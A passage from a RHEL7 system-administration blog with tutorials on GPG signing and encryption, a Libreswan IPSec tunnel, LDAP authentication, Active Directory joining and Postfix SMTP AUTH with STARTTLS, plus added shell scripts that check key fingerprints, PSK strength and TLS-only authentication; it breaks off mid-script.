Thursday 30 April 2015

Digital Signature using OpenPGP (gpg2) in RHEL7

In this tutorial, Batul will create a public-private key pair and give her public key to her friend Shabbir, so that he can verify the digital signature on files sent by her.

Batul will sign a file using her private key and send the file along with the signature to Shabbir. Shabbir will verify the signature on the file using Batul's public key.

Since nobody else knows Batul's private key, only Batul could have signed the file. So Shabbir can be sure that the file has been sent by Batul and that it has not been modified in transit. 

 
Batul's Machine:
1) Install package
[batul@server3 ~]$ sudo yum -y install gnupg2

2) Generate public-private key pair. Enter passphrase to protect the private key. 
[batul@server3 ~]$ gpg2 --gen-key

3) List the key.
[batul@server3 ~]$ gpg2 --list-key
/home/batul/.gnupg/pubring.gpg
------------------------------
pub   2048R/13A3D971 2015-04-30
uid                  batul dahod (batul's encrpt key) <batul@mycompany.com>
sub   2048R/8AE3A0FA 2015-04-30

4) Save the public key in a file.
[batul@server3 ~]$ gpg2 --export "batul dahod" > batul.pub

5) The public key file 'batul.pub' is given to Batul's friend Shabbir, so that he can verify the digital signature on files sent by her.

6) Create a digital signature on the file 'hello.txt'
[batul@server3 ~]$ gpg2 --armor --detach-sign hello.txt

You need a passphrase to unlock the secret key for
user: "batul dahod (batul's encrpt key) <batul@mycompany.com>"
2048-bit RSA key, ID 13A3D971, created 2015-04-30

7) Send the file 'hello.txt' and the signature file 'hello.txt.asc' to Shabbir.

Shabbir's Machine:
1) Install Batul's public key
[shabbir@meru ~]$ gpg2 --import batul.pub
gpg: key 13A3D971: public key "batul dahod (batul's encrpt key) <batul@mycompany.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

2) Verify digital signature on the file 'hello.txt' using the signature file 'hello.txt.asc'
[shabbir@meru ~]$ gpg2 --verify hello.txt.asc hello.txt
gpg: Signature made Thu 30 Apr 2015 05:48:32 PM IST using RSA key ID 13A3D971
gpg: Good signature from "batul dahod (batul's encrpt key) <batul@mycompany.com>"

File Encryption using OpenPGP (gpg2) in RHEL7

In this tutorial, Batul will create a public-private key pair and give her public key to her friend Shabbir, so that he can send encrypted files to her.

Shabbir will encrypt a file using Batul's public key and send the encrypted file to her. Batul will decrypt the encrypted file using her private key.

Since nobody else knows Batul's private key, only Batul can decrypt the encrypted file. 

Batul's Machine:

1) Install package
[batul@server3 ~]$ sudo yum -y install gnupg2

2) Generate public-private key pair. Enter passphrase to protect the private key. 
[batul@server3 ~]$ gpg2 --gen-key


3) List the key.
[batul@server3 ~]$ gpg2 --list-key
/home/batul/.gnupg/pubring.gpg
------------------------------
pub   2048R/13A3D971 2015-04-30
uid                  batul dahod (batul's encrpt key) <batul@mycompany.com>
sub   2048R/8AE3A0FA 2015-04-30

4) Save the public key in a file.
[batul@server3 ~]$ gpg2 --export "batul dahod" > batul.pub

5) The public key file 'batul.pub' is given to Batul's friend Shabbir, so that he can send encrypted files to her.

Shabbir's Machine:
1) Install Batul's public key
[shabbir@meru ~]$ gpg2 --import batul.pub
gpg: key 13A3D971: public key "batul dahod (batul's encrpt key) <batul@mycompany.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

2) Encrypt a file 'hello.txt' using Batul's public key.
[shabbir@meru ~]$ gpg2 --armor -r "batul dahod" --encrypt hello.txt
gpg: 8AE3A0FA: There is no assurance this key belongs to the named user

pub  2048R/8AE3A0FA 2015-04-30 batul dahod (batul's encrpt key) <batul@mycompany.com>
 Primary key fingerprint: 71D0 897E 301A F5E7 17F8  BE8B BBA6 CC6A 13A3 D971
      Subkey fingerprint: 545F FBB1 A579 6AE0 F7B6  CEFD 9E6A AFAB 8AE3 A0FA

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

3) Send the encrypted file 'hello.txt.asc' to Batul.

Batul's Machine:
1) Decrypt the file 'hello.txt.asc' using the private key
[batul@server3 ~]$ gpg2 --output hello.txt --decrypt hello.txt.asc

You need a passphrase to unlock the secret key for
user: "batul dahod (batul's encrpt key) <batul@mycompany.com>"
2048-bit RSA key, ID 8AE3A0FA, created 2015-04-30 (main key ID 13A3D971)

gpg: encrypted with 2048-bit RSA key, ID 8AE3A0FA, created 2015-04-30
      "batul dahod (batul's encrpt key) <batul@mycompany.com>"

2) View the unencrypted file 'hello.txt'.
[batul@server3 ~]$ cat hello.txt
my name is shabbir rangwala
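
Both tutorials above rest on Shabbir holding the right key: a key generated by someone else with Batul's name on it would also produce "Good signature", and encrypting to it would hand the plaintext to whoever holds it, which is exactly what gpg2 warns about at the "Use this key anyway?" prompt. The script below is an added example, not code from the original post. It pins Batul's key to the primary fingerprint gpg2 printed in step 2 of the encryption tutorial (assumed to have been confirmed with Batul out of band, e.g. read over the phone), and because gpg2 may not be installed where it is tried, the parsers are also run on constructed gpg output embedded in the script; the wrapper and sample names are mine.

```shell
#!/bin/sh
# Added example, not from the original post. Pins Batul's OpenPGP key to a
# fingerprint obtained out of band, so "Good signature" (signing tutorial)
# and "Use this key anyway?" (encryption tutorial) are decided by comparing
# fingerprints rather than by the name on the key.
# Assumed: EXPECTED_FPR is the primary key fingerprint printed by gpg2 in
# step 2 of the encryption tutorial; gpg2 may be absent on this machine, so
# the parsers are also run on constructed gpg output embedded below.

EXPECTED_FPR="71D0 897E 301A F5E7 17F8  BE8B BBA6 CC6A 13A3 D971"

# norm_fpr: drop spaces and upper-case the hex so any display form compares equal.
norm_fpr() { printf '%s' "$1" | tr -d ' ' | tr 'abcdef' 'ABCDEF'; }

# key_matches EXPECTED: reads 'gpg2 --with-colons --fingerprint' output on
# stdin; succeeds only if the primary key's fpr record equals EXPECTED.
# The fpr record that follows a pub record is the primary key; fpr records
# after a sub record belong to subkeys (8AE3A0FA in the post) and are ignored.
key_matches() {
    want=$(norm_fpr "$1"); in_pub=0
    while IFS= read -r line; do
        case "$line" in
            pub:*) in_pub=1 ;;
            sub:*) in_pub=0 ;;
            fpr:*)
                if [ "$in_pub" -eq 1 ]; then
                    got=$(printf '%s' "$line" | cut -d: -f10)   # field 10 holds the fingerprint
                    [ "$got" = "$want" ] && return 0
                    return 1
                fi ;;
        esac
    done
    return 1
}

# sig_matches EXPECTED: reads 'gpg2 --status-fd 1 --verify' output on stdin;
# succeeds only for a VALIDSIG whose last field (primary key fingerprint)
# equals EXPECTED. BADSIG, NO_PUBKEY and a valid signature by some other
# key all fail, whatever user ID that key carries.
sig_matches() {
    want=$(norm_fpr "$1")
    while IFS= read -r line; do
        case "$line" in
            "[GNUPG:] VALIDSIG "*)
                last=${line##* }          # last space-separated token
                [ "$last" = "$want" ] && return 0 ;;
        esac
    done
    return 1
}

# Wrappers for a real keyring, used on Shabbir's machine where gpg2 is installed.
check_imported_key() { gpg2 --batch --with-colons --fingerprint "$2" | key_matches "$1"; }            # $2 = user ID
verify_detached()    { gpg2 --batch --status-fd 1 --verify "$2" "$3" 2>/dev/null | sig_matches "$1"; }  # $2 = .asc, $3 = file

# Constructed sample output, shaped like gpg 2.0 on RHEL7 with the post's key IDs.
SAMPLE_LISTING='pub:-:2048:1:BBA6CC6A13A3D971:1430352000:::-:::scESC:
fpr:::::::::71D0897E301AF5E717F8BE8BBBA6CC6A13A3D971:
uid:-::::1430352000::0000000000000000000000000000000000000000::batul dahod <batul@mycompany.com>:
sub:-:2048:1:9E6AAFAB8AE3A0FA:1430352000::::::e:
fpr:::::::::545FFBB1A5796AE0F7B6CEFD9E6AAFAB8AE3A0FA:'
# Constructed: a different key carrying the same user ID (placeholder fingerprint).
SAMPLE_LISTING_OTHER='pub:-:2048:1:0000000000000001:1430352000:::-:::scESC:
fpr:::::::::0000000000000000000000000000000000000001:
uid:-::::1430352000::0000000000000000000000000000000000000000::batul dahod <batul@mycompany.com>:'
SAMPLE_STATUS_GOOD='[GNUPG:] NEWSIG
[GNUPG:] GOODSIG BBA6CC6A13A3D971 batul dahod <batul@mycompany.com>
[GNUPG:] VALIDSIG 71D0897E301AF5E717F8BE8BBBA6CC6A13A3D971 2015-04-30 1430396312 0 4 0 1 2 00 71D0897E301AF5E717F8BE8BBBA6CC6A13A3D971
[GNUPG:] TRUST_UNDEFINED'
SAMPLE_STATUS_BAD='[GNUPG:] NEWSIG
[GNUPG:] BADSIG BBA6CC6A13A3D971 batul dahod <batul@mycompany.com>'

# demo_all: run the checks on the samples; 0 when every case is decided correctly.
demo_all() {
    printf '%s\n' "$SAMPLE_LISTING" | key_matches "$EXPECTED_FPR" || return 1
    printf '%s\n' "$SAMPLE_LISTING_OTHER" | key_matches "$EXPECTED_FPR" && return 1
    printf '%s\n' "$SAMPLE_STATUS_GOOD" | sig_matches "$EXPECTED_FPR" || return 1
    printf '%s\n' "$SAMPLE_STATUS_BAD" | sig_matches "$EXPECTED_FPR" && return 1
    return 0
}
```

On Shabbir's machine, `check_imported_key "$EXPECTED_FPR" "batul dahod"` belongs right after `gpg2 --import batul.pub`, and `verify_detached "$EXPECTED_FPR" hello.txt.asc hello.txt` replaces reading the "Good signature" line by eye.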

Wednesday 29 April 2015

IPSec VPN (PSK Authentication) using Libreswan in RHEL7

Pre-Shared Key (PSK) Authentication:

PSK Authentication is based on both the hosts having a "shared" secret key. Both the hosts should have the same secret key to authenticate each other.

The security of a PSK system is based on the PSK being secret. Therefore, a major issue is the secure distribution of the PSK to remote hosts.    

Consider 2 hosts: 192.168.122.2 and 192.168.122.3
An IPSec VPN tunnel will be established between these 2 hosts.
 
On both the machines, run the following commands:
1) Install package
     yum -y install libreswan

2) Open firewall ports: 500/udp and the ESP protocol.
     firewall-cmd --zone=public --add-port=500/udp --permanent
     firewall-cmd --add-rich-rule='rule protocol value="esp" accept' --permanent
     firewall-cmd --reload

3) Edit the file '/etc/ipsec.secrets' and add the following entry.
      192.168.122.2 192.168.122.3 : PSK "!shabbir2009@"

4) Edit the file '/etc/ipsec.conf' and add the following entry.
      conn mytunnel
          left=192.168.122.2
          right=192.168.122.3
          authby=secret
          auto=add

     Note: Remember to maintain the indentation as shown above. Also, don't leave any blank lines between the entries.

5) Start the service
       systemctl start ipsec

On any one machine, run the following commands:
6) Add the connection to the internal database.
      ipsec auto --add mytunnel
   
7) Establish  the connection.
      ipsec auto --up mytunnel
      
8) View Status
      ipsec auto --status
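
As the introduction says, the whole security of this tunnel rests on the PSK staying secret, and a short memorable string like the one in step 3 is also guessable. The script below is an added example, not part of the original post: it writes the same '/etc/ipsec.secrets' line for the two hosts above with a randomly generated key and root-only permissions, and checks an existing entry's key length and file mode. The output path is taken as an argument (assumption: you try it on a scratch file before pointing it at /etc).

```shell
#!/bin/sh
# Added example, not from the original post. Generates the ipsec.secrets
# entry for the tunnel above with a random PSK instead of a hand-chosen
# string, and checks an existing entry's length and file permissions.
# Assumed: LEFT/RIGHT are the post's two hosts; the output path is given as
# an argument so the script can be tried on a scratch file before /etc.

LEFT=192.168.122.2
RIGHT=192.168.122.3

# random_psk: 32 bytes from /dev/urandom as 64 hex characters (256 bits).
# Libreswan accepts any quoted string as a PSK, so hex is a safe choice.
random_psk() { od -An -tx1 -N32 /dev/urandom | tr -d ' \n'; }

# write_secrets OUT: write '<left> <right> : PSK "<key>"' to OUT with mode
# 0600 (root-only), the same line format the post uses. The identical file
# still has to reach the peer over a trusted channel; the PSK's secrecy is
# the whole security of the tunnel.
write_secrets() {
    out=$1; key=$(random_psk)
    ( umask 077; printf '%s %s : PSK "%s"\n' "$LEFT" "$RIGHT" "$key" > "$out" )
    chmod 600 "$out"
}

# secrets_ok FILE: 0 if FILE is mode 0600, contains the PSK line for the two
# peers and the quoted key is at least 32 characters long; 1 otherwise.
secrets_ok() {
    f=$1
    [ -n "$(find "$f" -perm 600)" ] || return 1
    key=$(sed -n "s/^$LEFT $RIGHT : PSK \"\(.*\)\"\$/\1/p" "$f")
    [ -n "$key" ] || return 1
    [ "${#key}" -ge 32 ]
}
```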

Tuesday 28 April 2015

LDAP Authentication Server and Client in RHEL7

When a user logs into a system, that user presents some sort of credential to establish the user identity. The system then checks those credentials against the configured authentication service. If the credentials match and the user account is active, then the user is authenticated. The information to verify the user can be located on the local system, or the local system can reference a user database on a remote system, such as LDAP or Kerberos.

A local system can use a variety of different data stores for user information, including Lightweight Directory Access Protocol (LDAP), Network Information Service (NIS), and Winbind. Additionally, both LDAP and NIS data stores can use Kerberos to authenticate users.

LDAP is often used by organizations as a central repository for user information and as an authentication service.

LDAP allows password authentication or Kerberos authentication.
The LDAP password option requires either a secure (ldaps://) URL or the TLS option to connect to the LDAP server.

In this tutorial, we will use LDAP for both identity lookup and authentication. The LDAP server is configured to store the usernames and passwords of all users, and client machines will authenticate against this central directory service. We will use Start TLS to encrypt the connections to the LDAP server; this enables a secure connection over the standard port.

We will create an LDAP server and migrate existing '/etc/passwd' and '/etc/shadow' files to the LDAP server. Then we will configure a client machine to authenticate against this LDAP server.

Configure LDAP Authentication Server


LDAP Server Name: oserver1.mycompany.com


1) Install packages.
[root@oserver1 ~]# yum install openldap-servers openldap-clients migration-tools

2) Start ldap server.
[root@oserver1 ~]# systemctl start slapd

3) Configure ldap client file '/etc/openldap/ldap.conf'. Edit the following entries.
       BASE dc=my-domain,dc=com 
       URI ldap://localhost


4) Verify operation of ldap server
[root@oserver1 ~]# ldapsearch -x -b '' -s base '(objectClass=*)' namingContexts

5) Add the cosine and nis LDAP schemas. These schemas contain definitions for the /etc/passwd and /etc/shadow files.
[root@oserver1 ~]# ldapadd -Y EXTERNAL -H ldapi:/// -D "cn=config" -f cosine.ldif
[root@oserver1 ~]# ldapadd -Y EXTERNAL -H ldapi:/// -D "cn=config" -f nis.ldif

6) Set root password.
    6.1)Create a file 'passwd.ldif' with the following entries.
       dn: olcDatabase={2}hdb,cn=config
       changetype: modify
       replace: olcRootPW
       olcRootPW: secret

    6.2) Make entry
[root@oserver1 ~]# ldapmodify -Y EXTERNAL -H ldapi:/// -f passwd.ldif

7) Add base domain entry.
   7.1)Create a file 'base.ldif' with the following entries.
       dn: dc=my-domain,dc=com
       dc: my-domain
       objectClass: top
       objectClass: domain

       dn: ou=People,dc=my-domain,dc=com
       ou: People
       objectClass: top
       objectClass: organizationalUnit

       dn: ou=Group,dc=my-domain,dc=com
       ou: Group
       objectClass: top
       objectClass: organizationalUnit

    7.2) Add the entry.
[root@oserver1 ~]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f base.ldif -w secret

8) Convert '/etc/passwd', '/etc/group' into ldif format and add to ldap database.
[root@oserver1 ~]# cd /usr/share/migrationtools
[root@oserver1 migrationtools]# grep ":10[0-9][0-9]" /etc/passwd > passwd
[root@oserver1 migrationtools]# ./migrate_passwd.pl  passwd users.ldif
[root@oserver1 migrationtools]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f users.ldif -w secret

[root@oserver1 migrationtools]# grep ":10[0-9][0-9]" /etc/group > group
[root@oserver1 migrationtools]# ./migrate_group.pl  group groups.ldif
[root@oserver1 migrationtools]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f groups.ldif -w secret
[root@oserver1 migrationtools]# cd
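
The grep in step 8 matches ":10xx" anywhere in a line, so an account whose GID, GECOS comment or home directory happens to contain that text is migrated along with the accounts whose UID is in range. The snippet below is an added example, not from the original post: it selects on the numeric field itself and feeds the same kind of file to migrate_passwd.pl and migrate_group.pl; the passwd lines it runs on are constructed, and the 1000-1099 range is the post's.

```shell
#!/bin/sh
# Added example, not from the original post. Step 8 above picks the accounts
# to migrate with 'grep ":10[0-9][0-9]"', which matches that text in any
# field (a GID, a GECOS comment, a home directory), not only the UID.
# select_by_id filters on the numeric field instead, producing the same
# kind of file migrate_passwd.pl / migrate_group.pl consume.
# Assumed: the post's 1000-1099 range; the passwd lines below are constructed.

LO=1000
HI=1099

# select_by_id FIELD: pass through lines whose colon-separated field FIELD is
# an integer in [LO, HI]. FIELD is 3 for both /etc/passwd (UID) and /etc/group (GID).
# Real use: select_by_id 3 < /etc/passwd > passwd ; select_by_id 3 < /etc/group > group
select_by_id() {
    awk -F: -v lo="$LO" -v hi="$HI" -v f="$1" '$f ~ /^[0-9]+$/ && $f+0 >= lo+0 && $f+0 <= hi+0'
}

# Constructed /etc/passwd sample. Only shabbir and batul are in range; svc
# has a matching GID and reports has ":1012" in its GECOS field.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
shabbir:x:1000:1000:shabbir:/home/shabbir:/bin/bash
batul:x:1001:1001:batul dahod:/home/batul:/bin/bash
svc:x:999:1000:service account:/var/lib/svc:/sbin/nologin
reports:x:2000:2000:1012 Main St:/home/reports:/bin/bash'

# legacy_count: how many sample lines the post's grep would select (4, not 2).
legacy_count() { printf '%s\n' "$SAMPLE_PASSWD" | grep -c ':10[0-9][0-9]'; }

# migrate_users: user names select_by_id chooses from the sample, space separated.
migrate_users() { printf '%s\n' "$SAMPLE_PASSWD" | select_by_id 3 | cut -d: -f1 | paste -sd ' ' -; }
```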

9) Open Firewall
[root@oserver1 ~]# firewall-cmd --zone=public --add-service=ldap --permanent
[root@oserver1 ~]# firewall-cmd --reload

10) Create the server certificate. Follow these steps:
    10.1) Create a local Certificate Authority (CA).
[root@oserver1 ~]# /etc/pki/tls/misc/CA  -newca

    10.2) Create public-private key pair
[root@oserver1 ~]#  openssl genrsa -out ldapserver.key

    10.3) Create a certificate signing request (CSR)
[root@oserver1 ~]# openssl req -new -key ldapserver.key -out ldapserver.csr

    10.4) Sign the certificate with the local CA.
[root@oserver1 ~]# openssl ca -in ldapserver.csr -out ldapserver.crt

   10.5) Copy the files 'ldapserver.key' and 'ldapserver.crt' to the dir. '/etc/openldap/certs/'

   10.6) We have to copy the CA cert file '/etc/pki/CA/cacert.pem' to the dir '/etc/openldap/cacerts/' on every client machine.

    10.7)Create a file 'cert.ldif' with the following entries.
          dn: cn=config
          changetype: modify
          replace: olcTLSCertificateFile
          olcTLSCertificateFile: /etc/openldap/certs/ldapserver.crt

          dn: cn=config
          changetype: modify
          replace: olcTLSCertificateKeyFile
          olcTLSCertificateKeyFile: /etc/openldap/certs/ldapserver.key


     10.8) Make entry
[root@oserver1 ~]# ldapmodify -Y EXTERNAL -H ldapi:/// -f cert.ldif

11) Configure logging.
    11.1) Edit the file '/etc/rsyslog.conf' and add the following entry.
              local4.*                    /var/log/ldap.log

    11.2) Restart rsyslog
[root@oserver1 ~]# systemctl restart rsyslog  

12) Restart the server.
[root@oserver1 ~]# systemctl restart slapd

13) Test the server
[root@oserver1 ~]# ldapsearch -x '(uid=*)' 


Configure Client for LDAP Authentication


We use the System Security Services Daemon (SSSD) for user information services and authentication, instead of the legacy services.

We use the authconfig tool for authentication configuration. If the --test action is specified, authconfig just reads the current settings from the various configuration files and prints their values. If the --update action is specified, authconfig must be run by root, and configuration changes are saved.

Each --enable option has a matching --disable option that disables the service if it is already enabled.

Perform the following steps on the client machine:

1) Install Packages.
[root@meru ~]# yum -y install openldap-clients authconfig sssd*

2) Configure authentication using 'authconfig'.
[root@meru ~]# authconfig --enableldap --enableldapauth --ldapserver="ldap://oserver1.mycompany.com:389" --ldapbasedn="dc=my-domain,dc=com" --passalgo=sha512 --enableldaptls --enablemkhomedir --update


Where,
--enableldap -> Use LDAP as an Identity Store. Configures user information services in /etc/nsswitch.conf. 

--enableldapauth -> Use LDAP as the Authentication method. Configures  authentication functions  via  /etc/pam.d/system-auth.

--ldapserver="ldap://oserver1.mycompany.com:389" -> The URL of the LDAP Server. This usually requires both the host name and port number of the LDAP server.

--ldapbasedn="dc=my-domain,dc=com" -> gives the root suffix or distinguished name (DN) for the user directory. All of the user entries used for identity/authentication will exist below this parent entry.

--enableldaptls -> sets whether to use Start TLS to encrypt the connections to the LDAP server. This enables a secure connection over a standard port. We will later retrieve the issuing CA certificate for the LDAP server and configure it in 'sssd'.

--passalgo=sha512 -> The algorithm used for storing password hashes.

--enablemkhomedir -> Create home directory on first login


3) Verify the settings.
[root@meru ~]# authconfig --test


4) Install C.A. Certificate
    4.1) Copy C.A. Certificate 'cacert.pem' from the server to the dir '/etc/openldap/cacerts/'

    4.2) Edit the file '/etc/sssd/sssd.conf' and add the following entry
           ldap_tls_cacert = /etc/openldap/cacerts/cacert.pem

    4.3) Restart sssd
[root@meru ~]# systemctl restart sssd

    4.4) Edit the file '/etc/openldap/ldap.conf' and add the following entry (ldap.conf separates option and value with whitespace, not '=')
           TLS_CACERT /etc/openldap/cacerts/cacert.pem

5) Test the connection. Consider the user 'shabbir'. Comment out the entry for user 'shabbir' in '/etc/passwd' if it exists, then execute the commands below.

[root@meru ~]# getent passwd shabbir
shabbir:*:1000:1000:shabbir:/home/shabbir:/bin/bash

[root@meru ~]# ldapsearch -x '(uid=shabbir)'   


6) Log in to the machine as user 'shabbir' with the password stored in the LDAP database.
  

Monday 27 April 2015

Add RHEL7 Server to Active Directory Domain



This tutorial is based on the following configuration:
domain name : mycompany.com
workgroup : MYCOMPANY
kerberos realm : MYCOMPANY.COM

Windows Server DNS Name: winserver.mycompany.com
Windows Server IP Address: 192.168.122.10

Linux Server DNS Name: server3.mycompany.com
Linux Server IP Address: 192.168.122.4

Ensure that DNS Server is properly configured on the Windows Server.

1) Install packages
yum install krb5-workstation pam_krb5

yum install samba samba-client samba-winbind

yum install authconfig



2) Ensure that the clocks on both systems are in sync. Time synchronization is essential for Kerberos to work.

3) Configure the DNS Service to use AD as its name server. DNS is critical for proper resolution of host names and domains for kerberos.
Edit the file '/etc/resolv.conf' and add the following entries:
search mycompany.com
nameserver 192.168.122.10


4) Configure Kerberos to use AD Kerberos realm. Edit the file '/etc/krb5.conf'.
[logging]
default = FILE:/var/log/krb5libs.log
kdc = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log

[libdefaults]
dns_lookup_realm = true
dns_lookup_kdc = true

ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
default_realm = MYCOMPANY.COM

5) Verify Kerberos operation.

[root@server3 ~]# kinit Administrator
Password for Administrator@MYCOMPANY.COM:
[root@server3 ~]# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@MYCOMPANY.COM

Valid starting Expires Service principal
04/27/2015 00:42:19 04/27/2015 10:42:19 krbtgt/MYCOMPANY.COM@MYCOMPANY.COM
renew until 05/04/2015 00:42:10
[root@server3 ~]# kdestroy

6) Configure Samba to connect to AD server. Edit the file '/etc/samba/smb.conf' and make the following changes:

workgroup = MYCOMPANY
server string = Samba Server Version %v
netbios name = SERVER3
interfaces = lo eth0 192.168.122.4/24
hosts allow = 127. 192.168.122.
security = ads
passdb backend = tdbsam
realm = MYCOMPANY.COM
kerberos method = secrets and keytab
template shell = /bin/sh
winbind offline logon = true
winbind separator = +
winbind use default domain = yes
idmap uid = 10000-19999
idmap gid = 10000-19999
idmap config MYCOMPANY:backend = rid
idmap config MYCOMPANY:range = 10000000-19999999

7) Check for configuration errors
testparm

8) Configure NSS and PAM to use winbind
authconfig --enablewinbind --enablewins --enablewinbindauth --update

9) Start services
systemctl start smb
systemctl start winbind

10) Add the Linux machine to the AD Domain
[root@server3 ~]# kinit Administrator

[root@server3 ~]# net ads join -U Administrator
Enter Administrator's password:
Using short domain name -- MYCOMPANY
Joined 'SERVER3' to dns domain 'mycompany.com'

11) Verify AD Server status

[root@server3 ~]# klist -k
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
3 SERVER3$@MYCOMPANY.COM

[root@server3 ~]# net ads info
LDAP server: 192.168.122.10
LDAP server name: WINSERVER.mycompany.com
Realm: MYCOMPANY.COM
Bind Path: dc=MYCOMPANY,dc=COM
LDAP port: 389
Server time: Mon, 27 Apr 2015 21:51:54 IST
KDC server: 192.168.122.10
Server time offset: 19835

Thursday 23 April 2015

Postfix SMTP AUTH and STARTTLS in RHEL7

SMTP AUTH:
The problem with the SMTP protocol is that it does not require authentication, so anyone can send mail through your email server. This has led to the problem of spam.

To prevent an attacker from using your mail server to relay their spam, an email server is generally configured to relay mail only from the local site's address range. This creates a problem for roaming users. The solution is SMTP AUTH, which requires mail senders to authenticate before submitting messages.

SMTP AUTH is used to allow roaming users to relay mail through a server safely without configuring the SMTP server to be an open relay. Postfix's SMTP AUTH uses an authentication library called SASL, which is not part of Postfix itself. Postfix can use either the Cyrus library or Dovecot as a source for SASL authentication. This tutorial uses Dovecot as a source for SASL authentication.

SMTP STARTTLS:
Normally SMTP is transmitted as cleartext over the wire, making it vulnerable to both passive sniffing and active alteration via man-in-the-middle attacks. SMTP STARTTLS is the extension that compliant ESMTP clients and servers can use to encrypt the SMTP session.

Typically, this is done by first starting TLS, to encrypt the SMTP session, and then issuing the SMTP AUTH command, to authenticate the client; this combination ensures that the username and password transferred as part of the SMTP AUTH are protected by the TLS encrypted session.
 
NOTE:
- Ensure that DNS Server is configured for the network.
- Ensure MX record entry for the domain is made in the DNS Server zone file.
- Ensure reverse dns entry for the mail server is made in the DNS Server zone file.
- To check for errors, view the log file '/var/log/maillog'

This tutorial is based on the following configuration:
- Domain Name: mycompany.com
- Email Gateway Name: meru.mycompany.com
- Email Gateway IP address: 192.168.122.1
- Network served by the mail gateway: 192.168.122.0/24

IMPORTANT: This tutorial assumes that 'dovecot' has been installed and configured. For dovecot installation and configuration refer to this post.

This tutorial is divided into 2 parts:
PART 1) Configuration of SMTP AUTH
PART 2) Configuration of STARTTLS

PART 1) Configuration of SMTP AUTH


Postfix Incoming/Outgoing Server (Gateway) Configuration: This server will receive incoming mail for the domain and relay outgoing mail from client machines.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com


    #the default domain name to append if @domain is missing
    myorigin = $mydomain

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all
    # remember to comment this line
   #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain


   #Trusted SMTP clients - can relay mail through this server.  
    mynetworks = 192.168.122.0/24, 127.0.0.0/8


    #enable SMTP AUTH through SASL
     smtpd_sasl_auth_enable = yes

    #tells SASL to use dovecot for authentication
    smtpd_sasl_type = dovecot

    #the sasl path
    smtpd_sasl_path = private/auth

    #prevent anonymous authentications
    smtpd_sasl_security_options = noanonymous

    #allow authentication from non standard clients such as Microsoft Outlook
    broken_sasl_auth_clients = yes

    #allow authenticated users, allow networks configured with the mynetworks directive, reject destinations other than the postfix server
    smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination


2) To view the parameters changed run the following command.
     postconf -n

3) To check for syntax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Edit the file  '/etc/dovecot/conf.d/10-master.conf' and make the following changes. This is the socket through which postfix communicates with dovecot for the authentication info.
    service auth {
      unix_listener /var/spool/postfix/private/auth {
       group = postfix
       mode = 0660
       user = postfix
     }
    }


6) Restart postfix service
    systemctl restart postfix 

7) Restart dovecot  
     systemctl restart dovecot

 

PART 2) Configuration of STARTTLS

1) Create the server certificate. Follow these steps:
    1.1) Create local CA (Certificate Authority)
            /etc/pki/tls/misc/CA  -newca

    1.2) Create public-private key pair
          openssl genrsa -out postfixkey.pem

    1.3) Create a certificate signing request (CSR)
          openssl req -new -key postfixkey.pem -out postfix.csr

    1.4) Sign the Certificate.
          openssl ca -in postfix.csr -out postfixcert.pem
   1.5) Copy the CA cert file '/etc/pki/CA/cacert.pem'.


2) The CA certificate file 'cacert.pem', the server certificate file 'postfixcert.pem' and the server key file 'postfixkey.pem' are copied to the '/etc/postfix/certs/' directory.

3) Edit the file '/etc/postfix/main.cf'. Make the following changes

       #Certificate file of the CA who has signed the server certificate
       smtpd_tls_CAfile = /etc/postfix/certs/cacert.pem

       #Server certificate 
       smtpd_tls_cert_file = /etc/postfix/certs/postfixcert.pem

       #Server private key
       smtpd_tls_key_file = /etc/postfix/certs/postfixkey.pem

       #not to require STARTTLS for all SMTP exchanges
       smtpd_tls_security_level = may

       #require STARTTLS for SMTP AUTH.
       smtpd_tls_auth_only = yes

4) To view the parameters changed run the following command.
     postconf -n

5) To check for syntax errors, run the following command.
     postfix check


6) Restart postfix service
    systemctl restart postfix
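
The point of 'smtpd_tls_auth_only = yes' in step 3 is that a client never gets the chance to send its password over the cleartext connection: AUTH must be missing from the EHLO reply before STARTTLS and present only after it. The script below is an added example, not code from the original post, that checks a gateway for exactly that; it parses constructed EHLO replies in the shape Postfix produces with the settings above (including the 'AUTH=' line that 'broken_sasl_auth_clients' adds), so it runs without a live server, and the live probes assume the post's gateway name and a made-up client name 'probe.mycompany.com'.

```shell
#!/bin/sh
# Added example, not from the original post. Checks that the gateway above
# does what smtpd_tls_auth_only = yes promises: the cleartext EHLO reply
# offers STARTTLS but no AUTH, and AUTH appears only after STARTTLS, so a
# client cannot send its password before the session is encrypted.
# Assumed: HOST is the post's gateway; the parsers are exercised on
# constructed EHLO replies, so the check also runs without a live server.

HOST=meru.mycompany.com

# ehlo_has KEYWORD: read an EHLO reply on stdin (CRLF tolerated); 0 if some
# 250 line announces KEYWORD, e.g. "250-STARTTLS", "250-AUTH PLAIN LOGIN"
# or the "250-AUTH=PLAIN LOGIN" form that broken_sasl_auth_clients adds.
ehlo_has() {
    while IFS= read -r line; do
        case "$(printf '%s' "$line" | tr -d '\r')" in
            "250-$1"|"250 $1"|"250-$1 "*|"250 $1 "*|"250-$1="*|"250 $1="*) return 0 ;;
        esac
    done
    return 1
}

# gateway_policy_ok PLAIN_REPLY TLS_REPLY: PLAIN_REPLY is the EHLO reply on
# the cleartext connection, TLS_REPLY the one after STARTTLS.
gateway_policy_ok() {
    if printf '%s\n' "$1" | ehlo_has AUTH; then return 1; fi   # password could be sent in the clear
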